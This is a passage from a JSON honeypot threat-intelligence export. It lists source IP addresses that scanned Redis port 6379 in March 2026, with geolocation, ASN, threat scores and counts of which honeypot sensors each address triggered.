      "first_seen": "2026-03-06T03:44:54.000Z",
      "last_seen": "2026-03-24T02:37:07.072Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 30.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 15.8,
        "diversity": 6,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 19,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T03:46:02.039000+00:00",
        "last_seen_30d": "2026-03-24T02:37:07.072000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "20.102.98.235": {
      "attack_count": 15,
      "first_seen": "2026-03-07T06:50:42.000Z",
      "last_seen": "2026-03-07T06:52:54.759Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 49.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.8,
        "persistence": 20.0,
        "diversity": 8,
        "spread": 15,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 24,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T06:12:38.627000+00:00",
        "last_seen_30d": "2026-03-27T22:12:56.688000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15,
        "Honeytrap": 6,
        "Redishoneypot": 3
      }
    },
    "20.169.49.41": {
      "attack_count": 15,
      "first_seen": "2026-03-18T23:57:29.000Z",
      "last_seen": "2026-03-18T23:59:27.346Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 72.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.1,
        "persistence": 22.5,
        "diversity": 12,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 32,
        "days_active_30d": 27,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-04T23:06:31.557000+00:00",
        "last_seen_30d": "2026-03-30T18:07:38.639000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 21,
        "Honeytrap": 6,
        "Redishoneypot": 3,
        "Dionaea": 1,
        "ElasticPot": 1
      }
    },
    "129.212.180.243": {
      "attack_count": 14,
      "first_seen": "2026-03-14T01:45:50.000Z",
      "last_seen": "2026-03-14T01:46:54.117Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Douglasville",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 54.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 6.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 130844,
        "days_active_30d": 8,
        "ports_targeted_30d": 63947,
        "honeypots_triggered_30d": 18,
        "first_seen_30d": "2026-03-14T01:45:01+00:00",
        "last_seen_30d": "2026-03-21T19:30:21.460000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 113887,
        "Honeytrap": 16893,
        "Cowrie": 15,
        "Dionaea": 12,
        "Miniprint": 8,
        "ConPot": 7,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "CitrixHoneypot": 1,
        "ElasticPot": 1,
        "H0neytr4p": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "167.94.138.119": {
      "attack_count": 13,
      "first_seen": "2026-03-06T17:07:19.000Z",
      "last_seen": "2026-03-06T17:08:26.399Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 61.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 20.4,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 109,
        "days_active_30d": 22,
        "ports_targeted_30d": 29,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T06:19:22.991000+00:00",
        "last_seen_30d": "2026-03-23T17:33:01.791000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 60,
        "Honeytrap": 33,
        "Miniprint": 6,
        "Redishoneypot": 6,
        "H0neytr4p": 4
      }
    },
    "167.94.138.200": {
      "attack_count": 13,
      "first_seen": "2026-03-17T15:30:27.000Z",
      "last_seen": "2026-03-17T15:31:34.449Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 58.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 20.9,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 123,
        "days_active_30d": 21,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T09:05:11+00:00",
        "last_seen_30d": "2026-03-22T16:41:23.957000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 71,
        "Honeytrap": 37,
        "Redishoneypot": 6,
        "Dionaea": 5,
        "CitrixHoneypot": 4
      }
    },
    "91.230.168.184": {
      "attack_count": 13,
      "first_seen": "2026-03-09T11:24:36.000Z",
      "last_seen": "2026-03-09T11:25:57.085Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 83.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 238,
        "days_active_30d": 30,
        "ports_targeted_30d": 70,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T03:24:17.302000+00:00",
        "last_seen_30d": "2026-03-31T20:07:27.786000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 189,
        "Honeytrap": 46,
        "Redishoneypot": 3
      }
    },
    "124.117.192.124": {
      "attack_count": 12,
      "first_seen": "2026-03-31T06:11:38.000Z",
      "last_seen": "2026-03-31T06:12:41.789Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 21.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T06:11:39+00:00",
        "last_seen_30d": "2026-03-31T06:12:41.789000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "162.142.125.215": {
      "attack_count": 12,
      "first_seen": "2026-03-02T02:34:43.000Z",
      "last_seen": "2026-03-02T02:35:50.968Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 59.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 18.3,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 67,
        "days_active_30d": 22,
        "ports_targeted_30d": 24,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T02:08:42+00:00",
        "last_seen_30d": "2026-03-23T14:58:59.670000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 31,
        "Honeytrap": 23,
        "Cowrie": 6,
        "Redishoneypot": 6,
        "Sentrypeer": 1
      }
    },
    "162.142.125.85": {
      "attack_count": 12,
      "first_seen": "2026-03-06T17:06:58.000Z",
      "last_seen": "2026-03-11T03:57:48.469Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 39.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 16.7,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 47,
        "days_active_30d": 19,
        "ports_targeted_30d": 42,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T04:52:22.863000+00:00",
        "last_seen_30d": "2026-03-20T16:07:08.481000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 46,
        "ConPot": 1
      }
    },
    "167.94.138.32": {
      "attack_count": 12,
      "first_seen": "2026-03-08T18:37:30.000Z",
      "last_seen": "2026-03-08T18:38:43.892Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 19.1,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 82,
        "days_active_30d": 21,
        "ports_targeted_30d": 26,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T00:54:59+00:00",
        "last_seen_30d": "2026-03-22T19:57:08.036000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 40,
        "Honeytrap": 35,
        "Redishoneypot": 6,
        "ConPot": 1
      }
    },
    "206.168.34.44": {
      "attack_count": 12,
      "first_seen": "2026-03-03T20:31:32.000Z",
      "last_seen": "2026-03-03T20:32:36.117Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 58.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.5,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 141,
        "days_active_30d": 21,
        "ports_targeted_30d": 38,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T02:06:35+00:00",
        "last_seen_30d": "2026-03-22T03:50:47.664000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 84,
        "Honeytrap": 41,
        "Redishoneypot": 6,
        "Tanner": 4,
        "ElasticPot": 3,
        "H0neytr4p": 2,
        "Dionaea": 1
      }
    },
    "206.168.34.54": {
      "attack_count": 12,
      "first_seen": "2026-03-05T15:10:57.000Z",
      "last_seen": "2026-03-05T15:12:07.123Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 61.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.9,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 97,
        "days_active_30d": 22,
        "ports_targeted_30d": 27,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T12:56:24+00:00",
        "last_seen_30d": "2026-03-23T14:56:18.397000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 47,
        "Honeytrap": 42,
        "Redishoneypot": 6,
        "Dionaea": 1,
        "Ipphoney": 1
      }
    },
    "66.132.153.126": {
      "attack_count": 12,
      "first_seen": "2026-03-07T17:30:35.000Z",
      "last_seen": "2026-03-07T17:31:40.153Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 55.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 21.7,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 147,
        "days_active_30d": 20,
        "ports_targeted_30d": 26,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T06:31:14.195000+00:00",
        "last_seen_30d": "2026-03-21T05:15:20.125000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 114,
        "Honeytrap": 22,
        "Redishoneypot": 6,
        "Dionaea": 3,
        "Honeyaml": 2
      }
    },
    "118.212.120.238": {
      "attack_count": 11,
      "first_seen": "2026-03-31T06:11:18.000Z",
      "last_seen": "2026-03-31T06:22:48.076Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 20.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T06:11:20+00:00",
        "last_seen_30d": "2026-03-31T06:22:48.076000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "123.56.146.124": {
      "attack_count": 11,
      "first_seen": "2026-03-05T13:03:18.000Z",
      "last_seen": "2026-03-17T14:22:22.647Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 11.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 10.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 13,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T13:04:21.192000+00:00",
        "last_seen_30d": "2026-03-17T14:22:22.647000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "193.143.1.23": {
      "attack_count": 11,
      "first_seen": "2026-03-10T09:23:46.000Z",
      "last_seen": "2026-03-10T09:24:57.589Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": "Moscow",
      "asn": 198953,
      "as_org": "Proton66 OOO",
      "threat_score": 6.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-10T09:23:46+00:00",
        "last_seen_30d": "2026-03-10T09:24:57.589000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 1
      }
    },
    "103.124.172.141": {
      "attack_count": 10,
      "first_seen": "2026-03-08T12:20:36.000Z",
      "last_seen": "2026-03-08T12:21:40.903Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": null,
      "asn": 139549,
      "as_org": "Crisp Enterprises",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-08T12:20:36+00:00",
        "last_seen_30d": "2026-03-08T12:21:40.903000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "103.21.55.238": {
      "attack_count": 10,
      "first_seen": "2026-03-10T04:49:17.000Z",
      "last_seen": "2026-03-10T04:50:24.981Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Indore",
      "asn": 132445,
      "as_org": "Khetan Cable Network Pvt. Limited",
      "threat_score": 5.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-10T04:49:17+00:00",
        "last_seen_30d": "2026-03-10T04:50:24.981000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "167.248.133.113": {
      "attack_count": 10,
      "first_seen": "2026-03-18T09:05:38.000Z",
      "last_seen": "2026-03-21T20:54:59.399Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 1025,
        "days_active_30d": 22,
        "ports_targeted_30d": 910,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:32:08.999000+00:00",
        "last_seen_30d": "2026-03-23T20:55:10.139000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1025
      }
    },
    "185.226.196.12": {
      "attack_count": 10,
      "first_seen": "2026-03-20T01:29:54.000Z",
      "last_seen": "2026-03-20T01:31:00.962Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 21859,
      "as_org": "Zenlayer Inc",
      "threat_score": 62.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 19.9,
        "persistence": 20.0,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 98,
        "days_active_30d": 24,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T19:47:38+00:00",
        "last_seen_30d": "2026-03-26T11:20:30.239000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 58,
        "Honeytrap": 37,
        "Redishoneypot": 3
      }
    },
    "20.207.68.254": {
      "attack_count": 10,
      "first_seen": "2026-03-21T14:37:47.000Z",
      "last_seen": "2026-03-21T14:38:49.455Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Pune",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 12.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T14:37:48+00:00",
        "last_seen_30d": "2026-03-21T14:38:49.455000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "218.2.210.142": {
      "attack_count": 10,
      "first_seen": "2026-03-03T15:44:59.000Z",
      "last_seen": "2026-03-10T05:00:28.162Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 5.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T15:46:04.127000+00:00",
        "last_seen_30d": "2026-03-10T05:00:28.162000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "36.111.158.225": {
      "attack_count": 10,
      "first_seen": "2026-03-04T12:43:24.000Z",
      "last_seen": "2026-03-14T16:36:44.605Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 134768,
      "as_org": "CHINANET SHAANXI province Cloud Base network",
      "threat_score": 8.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 9.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 11,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T12:44:28.033000+00:00",
        "last_seen_30d": "2026-03-14T16:36:44.605000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "45.130.148.86": {
      "attack_count": 10,
      "first_seen": "2026-03-13T16:22:16.000Z",
      "last_seen": "2026-03-14T12:38:31.398Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Uzbekistan",
      "country_code": "UZ",
      "city": "Tashkent",
      "asn": 35682,
      "as_org": "Best Internet Solution Xk",
      "threat_score": 5.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 3.0,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 2,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-13T16:23:23.550000+00:00",
        "last_seen_30d": "2026-03-14T12:38:31.398000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2
      }
    },
    "130.107.158.17": {
      "attack_count": 9,
      "first_seen": "2026-03-09T00:04:50.000Z",
      "last_seen": "2026-03-09T00:05:52.005Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 5.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-09T00:04:50+00:00",
        "last_seen_30d": "2026-03-09T00:05:52.005000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "137.184.173.242": {
      "attack_count": 9,
      "first_seen": "2026-03-14T09:31:07.000Z",
      "last_seen": "2026-03-14T09:32:10.815Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 8.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T09:31:08+00:00",
        "last_seen_30d": "2026-03-14T09:32:10.815000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "198.235.24.58": {
      "attack_count": 9,
      "first_seen": "2026-03-06T08:38:48.000Z",
      "last_seen": "2026-03-06T08:40:29.178Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 89.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.4,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 109,
        "days_active_30d": 29,
        "ports_targeted_30d": 32,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T01:43:05.654000+00:00",
        "last_seen_30d": "2026-03-31T18:31:53.121000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 76,
        "Honeytrap": 27,
        "Redishoneypot": 3,
        "Dionaea": 2,
        "Tanner": 1
      }
    },
    "205.210.31.108": {
      "attack_count": 9,
      "first_seen": "2026-03-30T22:14:13.000Z",
      "last_seen": "2026-03-30T22:15:44.948Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 84.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.2,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 131,
        "days_active_30d": 26,
        "ports_targeted_30d": 35,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-05T06:05:30+00:00",
        "last_seen_30d": "2026-03-30T22:15:44.948000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 88,
        "Honeytrap": 28,
        "Dionaea": 8,
        "Cowrie": 4,
        "Redishoneypot": 3
      }
    },
    "205.210.31.204": {
      "attack_count": 9,
      "first_seen": "2026-03-21T18:33:16.000Z",
      "last_seen": "2026-03-21T18:34:57.449Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 91.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 125,
        "days_active_30d": 30,
        "ports_targeted_30d": 37,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T01:41:53+00:00",
        "last_seen_30d": "2026-03-31T19:55:11.087000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 80,
        "Honeytrap": 31,
        "Miniprint": 9,
        "Redishoneypot": 3,
        "Dicompot": 1,
        "Tanner": 1
      }
    },
    "3.137.136.201": {
      "attack_count": 9,
      "first_seen": "2026-03-07T11:46:56.000Z",
